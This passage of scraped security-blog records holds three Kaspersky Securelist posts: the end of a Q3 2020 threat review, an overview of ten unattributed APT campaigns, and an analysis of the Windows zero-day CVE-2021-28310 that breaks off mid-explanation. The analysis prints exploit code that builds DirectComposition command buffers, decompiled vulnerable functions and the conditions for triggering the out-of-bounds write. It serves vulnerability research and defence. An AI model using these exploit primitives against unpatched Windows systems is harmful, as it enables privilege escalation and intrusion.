We recommend that financial institutions monitor these threats closely, while improving their authentication processes, boosting anti-fraud technology and using threat intelligence data to understand and mitigate such risks. Further information on these threats, along with IoCs, YARA rules and hashes, is available to customers of our [Financial Threat Intelligence services](<https://www.kaspersky.com/enterprise-security/threat-intelligence>).

### The dangers of streaming

Home entertainment is changing as the adoption of streaming TV services increases. The global market for streaming services is [estimated to reach $688.7 billion by 2024](<https://www.businesswire.com/news/home/20200205005541/en/Global-Video-Streaming-Market-Estimated-Generate-688.7>). For cybercriminals, the widespread adoption of streaming services offers a new, potentially lucrative attack vector. For example, just hours after Disney+ was launched last November, [thousands of accounts were hacked](<https://www.zdnet.com/article/thousands-of-hacked-disney-accounts-are-already-for-sale-on-hacking-forums/>) and people's passwords and email details were changed. The criminals sold the compromised accounts online for between $3 and $11.

Even established services, such as Netflix and Hulu, are prime targets for distributing malware, [stealing passwords](<https://www.usatoday.com/story/tech/columnist/2019/08/31/did-someone-steal-your-netflix-password/2168504001/>) and launching spam and phishing attacks. The spike in the number of subscribers in the wake of the COVID-19 pandemic has provided cybercriminals with an even bigger pool of potential victims.
In the first quarter of this year, [Netflix added fifteen million subscribers](<https://www.theverge.com/2020/4/21/21229587/netflix-earnings-coronavirus-pandemic-streaming-entertainment>)—more than double what had been anticipated.

We took an [in-depth look at the threat landscape as it relates to streaming services](<https://securelist.com/the-streaming-wars-a-cybercriminals-perspective/97851/>). Unsurprisingly, phishing is one of the approaches taken by cybercriminals, as they seek to trick people into disclosing login credentials or payment information.

The criminals also capitalize on the growing interest in streaming services to distribute malware and adware. Typically, backdoors and other Trojans are downloaded when people attempt to gain access through unofficial means – by purchasing discounted accounts, obtaining a 'hack' to keep their free trial going, or attempting to access a free subscription. The chart below shows the number of people that encountered various threats containing the names of popular streaming platforms while trying to access these platforms through unofficial means between January 2019 and 8 April 2020:

The chart below shows the mix of malicious programs disguised under the name of popular streaming platforms between January 2019 and 8 April 2020:

You can read the full report [here](<https://securelist.com/the-streaming-wars-a-cybercriminals-perspective/97851/>), including our guidance on how to avoid phishing scams and malware related to streaming services.

### Threats facing digital education

Online learning became the norm in the wake of the COVID-19 pandemic, as classrooms and lecture theatres were forced to close.
Unfortunately, many educational institutions did not have proper cyber-security measures in place, putting online classrooms at increased risk of cyber-attacks. On 17 June, Microsoft Security Intelligence reported that the [education industry accounted for 61 percent of the 7.7 million malware encounters by enterprises](<https://edtechmagazine.com/k12/article/2020/06/cyberattacks-increasingly-threaten-schools-heres-what-know-perfcon>) in the previous 30 days – more than any other sector. In addition to malware, educational institutions also faced an increased risk of data breaches and violations of student privacy.

We recently published an overview of the threats facing schools and universities, including phishing related to online learning platforms and video conferencing applications, threats camouflaged as applications related to online learning and DDoS (Distributed Denial of Service) attacks affecting education.

In the first half of 2020, 168,550 people encountered various threats disguised as popular online learning platforms – a massive increase compared to just 820 in the same period the previous year.

The platform used most frequently as a lure was Zoom, with 99.5 per cent of detections, no surprise given the popularity of this platform.

The overwhelming majority of threats distributed under the guise of legitimate video conferencing and online learning platforms were riskware and adware.
Adware bombards users with unwanted adverts, while riskware consists of various files – including browser bars, download managers and remote administration tools – that may carry out various actions without consent.

In Q1 2020, the total number of DDoS attacks increased globally by 80 per cent when compared to the same period in 2019: and a large proportion of this increase can be attributed to attacks on distance e-learning services.

The number of DDoS attacks affecting educational resources that occurred between January and June this year increased by at least 350 per cent when compared to the same period in 2019.

It's likely that online learning will continue to grow in the future and cybercriminals will seek to exploit this. So it's vital that educational institutions review their cyber-security policy and adopt appropriate measures to secure their online learning environments and resources.

You can read our full report [here](<https://securelist.com/digital-education-the-cyberrisks-of-the-online-classroom/98380/>).

### Undeletable adware on smartphones

We've highlighted the issue of intrusive advertisements on smartphones a number of times in the past (you can find recent posts [here](<https://securelist.com/dropper-in-google-play/92496/>) and [here](<https://securelist.com/in-app-advertising-in-android/97065/>)). While it can be straightforward to remove [adware](<https://encyclopedia.kaspersky.com/glossary/adware/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), there are situations where it's much more difficult because the [adware is installed in the system partition](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>).
In such cases, trying to remove it can cause the device to fail. In addition, ads can be embedded in undeletable system apps and libraries at the code level. According to our data, 14.8 per cent of all users attacked by malware or adware in the last year suffered an infection of the system partition.

We have observed two main strategies for introducing undeletable adware onto a device. First, the malware obtains root access and [installs adware in the system partition](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>). Second, the code for displaying ads (or its loader) gets into the firmware of the device even before it reaches the consumer. Our data indicates that between one and five per cent of people running our mobile security solutions have encountered this. In the main, these are owners of smartphones and tablets of certain brands in the lower price segment. For some popular vendors offering low-cost devices, this figure reaches 27 per cent.

Since the Android security model assumes that anti-virus is a normal app, it is unable to do anything about [adware or malware in system directories](<https://securelist.com/pig-in-a-poke-smartphone-adware/97607/>), making this a serious problem.

Our investigations show that the focus of some mobile device suppliers is on maximizing profits through all kinds of advertising tools, even if such tools cause inconvenience to device owners.
If advertising networks are ready to pay for views, clicks, and installations regardless of their source, it makes sense for them to embed ad modules into devices to increase the profit from each device sold.", "cvss3": {}, "published": "2020-11-20T10:00:58", "type": "securelist", "title": "IT threat evolution Q3 2020", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0986", "CVE-2020-1380"], "modified": "2020-11-20T10:00:58", "id": "SECURELIST:03ACF8FB3AEA9D33D265642AD60AF9E9", "href": "https://securelist.com/it-threat-evolution-q3-2020/99382/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-10T08:05:03", "description": "\n\nTargeted attack attribution is always a tricky thing, and in general, we believe that attribution is best left to law enforcement agencies. The reason is that, while in 90% of cases it is possible to understand a few things about the attackers, such as their native language or even location, the remaining 10% can lead to embarrassing attribution errors or worse. High-profile actors make every effort to stay undetected inside the victim's infrastructure and to leave as few traces as they can. They implement a variety of techniques to make investigation of their campaigns more difficult. Using LOLBINS, common legitimate pentesting tools, and fileless malware; misleading security researchers by placing false flags\u2014these and other anti-forensic tricks often make threat attribution a matter of luck. That is why there is always a percentage of targeted attacks that remain unattributed for years. Recently, I shared [my TOP 10 list of the most mysterious APT](<https://twitter.com/craiu/status/1573272440704319488>) campaigns/tools on Twitter. In this article, I provide a bit more detail on each case.\n\n## 1\\. Project TajMahal\n\nIn late 2018, we discovered a sophisticated espionage framework, which we dubbed "[TajMahal](<https://securelist.com/project-tajmahal/90240/>)". 
It consists of two different packages, self-named "Tokyo" and "Yokohama", and is capable of stealing a variety of data, including data from CDs burnt on the victim's machine and documents sent to the printer queue. Each package includes a number of malicious tools: backdoors, keyloggers, downloaders, orchestrators, screen and webcam grabbers, audio recorders, and more. In total, up to 80 malicious modules were discovered.\n\nProject TajMahal had been active for at least five years before we first detected it. What makes it even more mysterious is that its only known victim is a high-profile diplomatic entity. Who was behind the attack, if there were any other victims, or whether the whole toolset was developed to penetrate just one organization\u2014these questions remain unanswered.\n\n## 2\\. DarkUniverse\n\nDarkUniverse is [another APT framework](<https://securelist.com/darkuniverse-the-mysterious-apt-framework-27/94897/>) we discovered and reported on in 2018. It was active in the wild for at least eight years\u2014from 2009 to 2017\u2014and targeted at least 20 civilian and military entities in Syria, Iran, Afghanistan, Tanzania, Ethiopia, Sudan, Russia, Belarus, and the United Arab Emirates. The malware spreads through spear-phishing emails with a malicious Microsoft Office document as an attachment. It consists of several modules responsible for different espionage activities such as keylogging, mail traffic interception, making screenshots, collecting a wide variety of system information, and more.\n\nThe only prominent case of DarkUniverse being spotted in the wild was when their [sophisticated ItaDuke malware](<https://securelist.com/new-uyghur-and-tibetan-themed-attacks-using-pdf-exploits/35465/>) was dropped with a zero-day PDF exploit conspicuously named "Visaform Turkey.pdf". DarkUniverse remains unattributed, and it is unclear what happened to the actor after 2017.\n\n## 3\\. 
PuzzleMaker\n\nIn April 2021, we [detected several targeted attacks](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>) using a complex chain of zero-day exploits. To penetrate the system, the actor used a Google Chrome RCE vulnerability. We were not able to obtain the exploit, but suspected the flaw in question was [CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>), which enabled an attacker to execute arbitrary code inside the browser sandbox. Once inside, the actor exploited [CVE-2021-31955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31955>), an information disclosure vulnerability in the Windows kernel, to obtain the kernel address of the EPROCESS structure, and elevated privileges using one more Windows kernel flaw, [CVE-2021-31956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31956>).\n\nAfter successful exploitation of these vulnerabilities, custom malware consisting of four modules is delivered to the infected system. The modules are a stager, dropper, service, and remote shell, with the last one being the final payload. We dubbed the APT "PuzzleMaker".\n\nThe only weak link to known APT campaigns is a post-exploitation technique that is used both by PuzzleMaker and the CHAINSHOT malware, and by at least two state-sponsored threat actors. However, the technique is publicly known and can be used by various groups independently.\n\n## 4\\. ProjectSauron (aka Strider)\n\nProjectSauron was [first discovered](<https://securelist.com/faq-the-projectsauron-apt/75533/>) in September 2015, when [Kaspersky Anti-Targeted Attack Platform](<https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform>) detected anomalous network traffic in a customer organization. 
The traffic originated from a suspicious library loaded into the memory of a domain controller server and registered as a Windows password filter, which has access to plain-text passwords of administrative accounts. It proved to be a part of a complex APT platform targeting government, telecommunication, scientific, military, and financial organizations in Russia, Iran, Rwanda, and possibly Italian-speaking countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06125545/TOP-_10_unattributed_APT_mysteries_01.png>)\n\n**_ProjectSauron got its name from the "Sauron" mentioned in its configuration_**\n\nThe ProjectSauron platform has a modular structure. Its core implants are unique to each victim, with different file names and sizes, and timestamps tailored to the target environment. This way, the artifacts discovered in one organization are of low value to other victims. These core implants act as backdoors that download additional modules and run commands in memory. The modules perform specific espionage functions, such as keylogging, stealing documents, or hijacking encryption keys from infected computers and attached USB devices. A special module is responsible for accessing air-gapped systems through infected USB drives.\n\nThe threat actor behind ProjectSauron uses a complex command-and-control infrastructure involving a wide range of different ISPs and a number of IP addresses across the US and Europe. The actor made every possible effort not to create recognizable patterns in its operations. The only thing that can be said with confidence is that this level of sophistication is hardly achievable without a nation-state sponsor. 
It is also worth noting that the actor probably learned from other high-profile APTs, such as [Duqu](<https://securelist.com/the-mystery-of-duqu-part-ten/32668/>), [Flame](<https://securelist.com/the-flame-questions-and-answers/34344/>), [Equation](<https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/>), and [Regin](<https://securelist.com/regin-nation-state-ownage-of-gsm-networks/67741/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06125628/TOP-_10_unattributed_APT_mysteries_02.gif>)\n\n## 5\\. USB Thief\n\nIn 2016, our colleagues at ESET [discovered a type of USB malware](<https://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/>) that featured a tricky self-protection mechanism. Dubbed "USB Thief", it consisted of six files, two of which were configuration files, while the other four were executables. The files were designed to be executed in a pre-defined order, and some of them were AES128-encrypted. The encryption key was generated using a unique USB device ID and certain disk properties. This made it hard to decrypt and run the files anywhere but on the infected USB drive.\n\nThree of the executable files are loaders that load the next-stage file. To ensure that the files are loaded in the correct order, they use hashes of the previously loaded files as their names. Additionally, some of the files check the name of the parent process and terminate if it is wrong. The final payload is a data stealer that looks to the configuration file for information about what data to exfiltrate, how to encrypt it, and where to store it. The data is always exfiltrated to a location on the infected USB device.\n\nAnother interesting technique implemented in USB Thief is using portable versions of certain applications, such as Notepad, Firefox, and TrueCrypt, to trick the user into running the first malware loader. 
To achieve this goal, it injects itself into the command chain of these applications as a plugin or a dynamically linked library. When the user runs the infected app, the malware launches, too. The malware is not widespread and is most likely used in highly targeted attacks involving a human asset.\n\nSince my post on Twitter, [our colleagues at ESET shared further information](<https://twitter.com/0xfmz/status/1573321520570671105>) on this toolset, which includes their suspicion that it might be associated with the Lamberts APT group:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06130040/TOP-_10_unattributed_APT_mysteries_03.png>)\n\n## 6\\. TENSHO (aka White Tur)\n\nIn early 2021, while searching for phishing pages that spoofed governmental websites, researchers at the PwC company [stumbled across a page](<https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html>) used to phish for Serbian Ministry of Defense credentials. This page led them to a previously unknown threat actor dubbed "TENSHO" or "White Tur". This actor has been active since at least 2017 and uses a variety of unique techniques and tools, which include weaponized documents, HTA and PowerShell scripts, Windows executables, and phishing pages that mimic governmental websites.\n\nAmong other tools, TENSHO uses the OpenHardwareMonitor open-source project, whose legitimate purpose is to monitor device temperature, fan speed, and other hardware health data. The threat actor spreads a malicious OpenHardwareMonitor package designed to deliver TENSHO's malware in the form of a PowerShell script or Windows binary.\n\nTo date, no ties have been discovered between this threat actor and any known APT group. TENSHO targets organizations inside Serbia and Republika Srpska (an entity in Bosnia and Herzegovina), indicating a very specific regional interest. 
Because many parties might be interested in targeting these regions, it is not easy to attribute the threat.\n\n## 7\\. PlexingEagle\n\nDuring the HITBSec 2017 conference in Amsterdam, Emmanuel Gadaix presented the discovery of a highly interesting GSM cyberespionage toolset, likely deployed by a very advanced threat actor, found during a routine security sweep in a client's systems.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06130131/TOP-_10_unattributed_APT_mysteries_04.png>)\n\n**_[A Surprise Encounter With a Telco APT](<https://conference.hitb.org/hitbsecconf2017ams/materials/D2T4%20-%20Emmanuel%20Gadaix%20-%20A%20Surprise%20Encounter%20With%20a%20Telco%20APT.pdf>), by courtesy of Emmanuel Gadaix_**\n\nThe compromise was originally discovered by Gadaix's team on a Solaris 10 machine that was used by the actors as an operating base. From there, the attackers leveraged advanced knowledge of the GSM infrastructure and network to patch the functionality normally used by law enforcement for eavesdropping on phone calls in order to implement their own mechanisms for intercepting calls of interest. The malware used in the intrusion was written in Lua, a language we saw used by other advanced threat actors, such as the ones behind Flame and Project Sauron. In his presentation, Gadaix hints at a number of similarities between this case and the so-called "Athens Affair", the two being the only known cases of this threat actor actually being caught in the wild.\n\n## 8\\. SinSono\n\nIn May 2021, Syniverse, a telecom company that provides text message routing services to such carriers as AT&T, Verizon, T-Mobile, and others, detected [unauthorized access to its IT systems](<https://www.theverge.com/2021/10/6/22713543/syniverse-hack-five-years-text-messages>). An internal investigation revealed that an unknown adversary first penetrated Syniverse's infrastructure in 2016. 
For five years they had acted undetected, accessed internal databases, and managed to compromise about 235 customers' login credentials for the company's Electronic Data Transfer (EDT) environment. Through these accounts, the threat actor could access highly sensitive consumer data, e.g., call records and the contents of text messages.\n\nWhile the company reset or inactivated credentials for all EDT customers, and contacted affected organizations, many questions remain: for instance, whether the actor actually stole sensitive data. Although the company itself and some of the carriers relying on its services see no indicators of a major breach and no attempt to disrupt their processes, we know neither who the actor was nor what their goals were. Our analysis of the data related to the attack indicates a high degree of attention and care regarding operational security and ensuring that attribution is difficult.\n\n## 9\\. MagicScroll (aka AcidBox)\n\nMagicScroll is a sophisticated malicious framework that was [first detected](<https://unit42.paloaltonetworks.com/acidbox-rare-malware/>) by Palo Alto's Unit 42 in 2019. It is a type of multistage malware with only a few known samples and one known victim, located in Russia and attacked in 2017. The initial infection stage of MagicScroll is missing. The first known stage is a loader that was created as a [security support provider](<https://learn.microsoft.com/en-us/windows/win32/secauthn/custom-security-packages>), a DLL that usually provides certain security features, such as application authentication. MagicScroll abuses this functionality to achieve injection into the lsass.exe process and probably persistence as well.\n\nThe loader's main purpose is to decrypt and load the next-stage module, which is stored in the registry. This module exploits a VirtualBox driver vulnerability to load an unsigned malicious driver in kernel mode. 
According to Unit 42, the exploitation of this vulnerability was previously observed in [Turla](<https://securelist.com/tag/turla/>) operations; however, there is no indication that the new actor has any links to that group. Unit 42 also found some loose similarities with [ProjectSauron](<https://securelist.com/faq-the-projectsauron-apt/75533/>), but they stated that these are too weak to consider the two campaigns linked. Nor have we found any ties between MagicScroll and any other known APTs.\n\n## 10\\. Metador\n\nThe Metador threat actor was [first publicly described](<https://www.sentinelone.com/labs/the-mystery-of-metador-an-unattributed-threat-hiding-in-telcos-isps-and-universities/>) by SentinelLabs in September 2022. It mainly targets ISPs, telecommunication companies, and universities in several countries in the Middle East and Africa; at least one of its victims has been attacked by nearly ten different APT groups.\n\nMetador operates two malware platforms dubbed "metaMain" and "Mafalda", which are deployed purely in memory. The metaMain platform is a feature-rich backdoor, which provides the threat actor with long-term access to the infected system. It can log keyboard and mouse events, make screenshots, download and upload files, and execute arbitrary shellcode.\n\nMafalda is a backdoor that is being actively developed. Its latest version was compiled with a timestamp of December 2021. It features a number of anti-analysis techniques and supports 67 commands, which is 13 more than in the previous version of the malware.\n\nApart from typical backdoor functionality, metaMain and Mafalda are capable of establishing connections to other (yet unknown) implants and exchanging data with them. One of those implants is called "Cryshell" and acts as an intermediate server between metaMain or Mafalda and the C2. 
There are reasons to believe that unknown Linux implants exist that can send data collected from Linux machines to Mafalda.\n\nIt is yet to be established who the actor behind Metador is and what their goals are. The sophisticated malware designed to stay undetected for a long time suggests that this is a cyberespionage campaign by a high-end threat actor. At least some of the C2 responses are in Spanish, which may indicate that the actor or some of its developers speak Spanish. Also, some cultural references were found in Metador's malware, including British pop punk lyrics and Argentinian political cartoons. The diversity of traces makes it difficult to determine in which state's interests it operates\u2014if at all. One of the hypotheses is that the group is a high-end contractor.\n\n## Conclusion\n\nAdvanced threat actors use every possible means to stay undetected, and\u2014if caught\u2014unattributed. Every now and then, security researchers will reveal a mysterious campaign that has remained undiscovered for years and that is nearly impossible to trace back to its sponsors with certainty. The ten stories described in this post are just some of the many unattributed mysteries we have seen through the years. 
That is why it is important to discuss them and share data on them within the cybersecurity community.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-07T10:00:47", "type": "securelist", "title": "TOP 10 unattributed APT mysteries", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2022-10-07T10:00:47", "id": "SECURELIST:8BBBF7B71E6D52B912070367475B6567", "href": "https://securelist.com/top-10-unattributed-apt-mysteries/107676/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-29T16:18:40", "description": "\n\nWhile analyzing the [CVE-2021-1732 exploit](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) originally discovered by the DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we discovered another zero-day exploit we believe is linked to the same actor. 
We reported this new exploit to Microsoft in February and after confirmation that it is indeed a zero-day, it received the designation CVE-2021-28310. Microsoft [released a patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>) for this vulnerability as a part of its April security updates.\n\nWe believe this exploit is used in the wild, potentially by several threat actors. It is an escalation of privilege (EoP) exploit that is likely used together with other browser exploits to escape sandboxes or get system privileges for further access. Unfortunately, we weren't able to capture a full chain, so we don't know if the exploit is used with another browser zero-day, or coupled with known, patched vulnerabilities.\n\nThe exploit was initially identified by our advanced exploit prevention technology and related detection records. In fact, over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone. In this blog we provide a technical analysis of the vulnerability and how the bad guys exploited it. More information about BITTER APT and IOCs is available to customers of the Kaspersky Intelligence Reporting service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## Technical details\n\nCVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using the DirectComposition API. 
[DirectComposition](<https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal>) is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.). We've already published a [blogpost](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>) about in-the-wild zero-days abusing the DirectComposition API. The DirectComposition API is implemented by the win32kbase.sys driver and the names of all related syscalls start with the string "NtDComposition".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/13101315/CVE_2021_28310_01.png>)\n\n_**DirectComposition syscalls in the win32kbase.sys driver**_\n\nFor exploitation only three syscalls are required: NtDCompositionCreateChannel, NtDCompositionProcessChannelBatchBuffer and NtDCompositionCommitChannel. The NtDCompositionCreateChannel syscall initiates a channel that can be used together with the NtDCompositionProcessChannelBatchBuffer syscall to send multiple DirectComposition commands in one go for processing by the kernel in a batch mode. For this to work, commands need to be written sequentially in a special buffer mapped by the NtDCompositionCreateChannel syscall. 
Each command has its own format with a variable length and list of parameters.\n \n \n enum DCOMPOSITION_COMMAND_ID\n {\n \tProcessCommandBufferIterator,\n \tCreateResource,\n \tOpenSharedResource,\n \tReleaseResource,\n \tGetAnimationTime,\n \tCapturePointer,\n \tOpenSharedResourceHandle,\n \tSetResourceCallbackId,\n \tSetResourceIntegerProperty,\n \tSetResourceFloatProperty,\n \tSetResourceHandleProperty,\n \tSetResourceHandleArrayProperty,\n \tSetResourceBufferProperty,\n \tSetResourceReferenceProperty,\n \tSetResourceReferenceArrayProperty,\n \tSetResourceAnimationProperty,\n \tSetResourceDeletedNotificationTag,\n \tAddVisualChild,\n \tRedirectMouseToHwnd,\n \tSetVisualInputSink,\n \tRemoveVisualChild\n };\n\n**_List of command IDs supported by the function DirectComposition::CApplicationChannel::ProcessCommandBufferIterator_**\n\nWhile these commands are processed by the kernel, they are also serialized into another format and passed by the Local Procedure Call (LPC) protocol to the Desktop Window Manager (dwm.exe) process for rendering to the screen. 
This procedure could be initiated by the third syscall \u2013 NtDCompositionCommitChannel.\n\nTo trigger the vulnerability the discovered exploit uses three types of commands: CreateResource, ReleaseResource and SetResourceBufferProperty.\n \n \n void CreateResourceCmd(int resourceId)\n {\n \tDWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);\n \t*buf = CreateResource;\n \tbuf[1] = resourceId;\n \tbuf[2] = PropertySet; // MIL_RESOURCE_TYPE\n \tbuf[3] = FALSE;\n \tBatchLength += 16;\n }\n \n void ReleaseResourceCmd(int resourceId)\n {\n \tDWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);\n \t*buf = ReleaseResource;\n \tbuf[1] = resourceId;\n \tBatchLength += 8;\n }\n \n void SetPropertyCmd(int resourceId, bool update, int propertyId, int storageOffset, int hidword, int lodword)\n {\n \tDWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);\n \t*buf = SetResourceBufferProperty;\n \tbuf[1] = resourceId;\n \tbuf[2] = update;\n \tbuf[3] = 20;\n \tbuf[4] = propertyId;\n \tbuf[5] = storageOffset;\n \tbuf[6] = _D2DVector2; // DCOMPOSITION_EXPRESSION_TYPE\n \tbuf[7] = hidword;\n \tbuf[8] = lodword;\n \tBatchLength += 36;\n }\n\n_**Format of commands used in exploitation**_\n\nLet's take a look at the function CPropertySet::ProcessSetPropertyValue in dwmcore.dll. This function is responsible for processing the SetResourceBufferProperty command. 
We are most interested in the code responsible for handling DCOMPOSITION_EXPRESSION_TYPE = D2DVector2.\n \n \n int CPropertySet::ProcessSetPropertyValue(CPropertySet *this, ...)\n {\n ...\n \n if (expression_type == _D2DVector2)\n {\n if (!update)\n {\n CPropertySet::AddProperty<D2DVector2>(this, propertyId, storageOffset, _D2DVector2, value);\n }\n else\n {\n if ( storageOffset != (this->properties[propertyId]->offset & 0x1FFFFFFF) )\n {\n goto fail;\n }\n \n CPropertySet::UpdateProperty<D2DVector2>(this, propertyId, _D2DVector2, value);\n }\n }\n \n ...\n }\n \n int CPropertySet::AddProperty<D2DVector2>(CResource *this, unsigned int propertyId, int storageOffset, int type, _QWORD *value)\n {\n int propertyIdAdded;\n \n int result = PropertySetStorage<DynArrayNoZero,PropertySetUserModeAllocator>::AddProperty<D2DVector2>(\n this->propertiesData,\n type,\n value,\n &propertyIdAdded);\n if ( result < 0 )\n {\n return result;\n }\n \n if ( propertyId != propertyIdAdded || storageOffset != (this->properties[propertyId]->offset & 0x1FFFFFFF) )\n {\n return 0x88980403;\n }\n \n result = CPropertySet::PropertyUpdated<D2DMatrix>(this, propertyId);\n if ( result < 0 )\n {\n return result;\n }\n \n return 0;\n }\n \n int CPropertySet::UpdateProperty<D2DVector2>(CResource *this, unsigned int propertyId, int type, _QWORD *value)\n {\n if ( this->properties[propertyId]->type == type )\n {\n *(_QWORD *)(this->propertiesData + (this->properties[propertyId]->offset & 0x1FFFFFFF)) = *value;\n \n int result = CPropertySet::PropertyUpdated<D2DMatrix>(this, propertyId);\n if ( result < 0 )\n {\n return result;\n }\n \n return 0;\n }\n else\n {\n return 0x80070057;\n }\n }\n\n**_Processing of the SetResourceBufferProperty (D2DVector2) command in dwmcore.dll_**\n\nFor the SetResourceBufferProperty command with the expression type set to D2DVector2, the function CPropertySet::ProcessSetPropertyValue(\u2026) would either call CPropertySet::AddProperty<D2DVector2>(\u2026) or 
CPropertySet::UpdateProperty<D2DVector2>(\u2026) depending on whether the update flag is set in the command. The first thing that catches the eye is the way the new property is added in the CPropertySet::AddProperty<D2DVector2>(\u2026) function. You can see that it adds a new property to the resource, but it only checks if the propertyId and storageOffset of a new property are equal to the provided values after the new property is added, and returns an error if that's not the case. Checking something after a job is done is bad coding practice and can result in vulnerabilities. However, a real issue can be found in the CPropertySet::UpdateProperty<D2DVector2>(\u2026) function. No check ensures that the provided propertyId is less than the count of properties added to the resource. As a result, an attacker can use this function to perform an OOB write past the propertiesData buffer if it manages to bypass two additional checks for data inside the properties array.\n \n \n (1)\tstorageOffset == (this->properties[propertyId]->offset & 0x1FFFFFFF)\n (2)\tthis->properties[propertyId]->type == type\n\n_**Conditions which need to be met for exploitation in dwmcore.dll**_\n\nThese checks could be bypassed if an attacker is able to allocate and release objects in the dwm.exe process to groom the heap into the desired state and spray memory at specific locations with fake properties. 
The discovered exploit manages to do this using the CreateResource, ReleaseResource and SetResourceBufferProperty commands.\n\nAt the time of writing, we still hadn't analyzed the updated binaries that are fixing this vulnerability, but to exclude the possibility of other variants for this vulnerability Microsoft would need to check the count of properties for other expression types as well.\n\nEven with the above issues in dwmcore.dll, if the desired memory state is achieved to bypass the previously mentioned checks and a batch of commands is issued to trigger the vulnerability, it still won't be triggered because there is one more thing preventing it from happening.\n\nAs mentioned above, commands are first processed by the kernel and only after that are they sent to Desktop Window Manager (dwm.exe). This means that if you try to send a command with an invalid propertyId, the NtDCompositionProcessChannelBatchBuffer syscall will return an error and the command will not be passed to the dwm.exe process. SetResourceBufferProperty commands with expression type set to D2DVector2 are processed in the win32kbase.sys driver with the functions DirectComposition::CPropertySetMarshaler::AddProperty<D2DVector2>(\u2026) and DirectComposition::CPropertySetMarshaler::UpdateProperty<D2DVector2>(\u2026), which are very similar to those present in dwmcore.dll (it's quite likely they were copy-pasted). 
However, the kernel version of the UpdateProperty<D2DVector2> function has one notable difference \u2013 it actually checks the count of properties added to the resource.\n \n \n int DirectComposition::CPropertySetMarshaler::UpdateProperty<D2DVector2>(DirectComposition::CPropertySetMarshaler *this, unsigned int *commandParams, _QWORD *value)\n {\n unsigned int propertyId = commandParams[0];\n unsigned int storageOffset = commandParams[1];\n unsigned int type = commandParams[2];\n \n if ( propertyId >= this->propertiesCount\n || storageOffset != (this->properties[propertyId]->offset & 0x1FFFFFFF)\n || type != this->properties[propertyId]->type )\n {\n return 0xC000000D;\n }\n else\n {\n *(_QWORD *)(this->propertiesData + (this->properties[propertyId]->offset & 0x1FFFFFFF)) = *value;\n ...\n }\n return 0;\n }\n\n_**DirectComposition::CPropertySetMarshaler::UpdateProperty<D2DVector2>(\u2026) in win32kbase.sys**_\n\nThe check for propertiesCount in the kernel mode version of the UpdateProperty<D2DVector2> function prevents further processing of a malicious command by its user mode twin and mitigates the vulnerability, but this is where DirectComposition::CPropertySetMarshaler::AddProperty<D2DVector2>(\u2026) comes into play. The kernel version of the AddProperty<D2DVector2> function works exactly like its user mode variant and it also applies the same behavior of checking the property after it has already been added and returns an error if propertyId and storageOffset of the created property do not match the provided values. Because of this, it's possible to use the AddProperty<D2DVector2> function to add a new property and force the function to return an error and cause inconsistency between the number of properties assigned to the same resource in kernel mode/user mode. 
